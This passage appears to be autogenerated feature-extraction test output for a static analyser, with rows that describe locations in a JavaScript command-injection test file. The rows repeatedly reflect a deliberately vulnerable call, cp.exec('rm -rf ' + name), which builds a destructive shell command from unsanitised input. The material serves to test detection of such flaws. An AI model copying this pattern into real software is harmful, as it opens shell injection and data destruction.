name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:6:38:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:6:38:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:6:38:9 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:6:38:9 | exec | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:6:38:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:19 | "rm -rf " | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:11:38:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:23:38:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:23:38:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:23:38:26 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:23:38:26 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:23:38:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:23:38:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:40:4 | bar | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:40:4 | bar | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:40:4 | bar | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:44:2 | bar(nam ... / OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:44:2 | bar(nam ... / OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:44:2 | bar(nam ... / OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:44:2 | bar(nam ... / OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:44:2 | bar(nam ... / OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:2:44:2 | bar(nam ... / OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | cp | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | this | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | this | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:40:4 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | 'arguments' object of method bar of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | 'arguments' object of method bar of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | 'arguments' object of method bar of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | 'arguments' object of method bar of class Cla3 | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | 'arguments' object of method bar of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | (name) ... / OK\\n\\t} | assignedToPropName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | (name) ... / OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | (name) ... / OK\\n\\t} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | (name) ... / OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | exceptional return of method bar of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | exceptional return of method bar of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | exceptional return of method bar of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | exceptional return of method bar of class Cla3 | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | exceptional return of method bar of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | return of method bar of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | return of method bar of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | return of method bar of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | return of method bar of class Cla3 | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:5:44:2 | return of method bar of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | 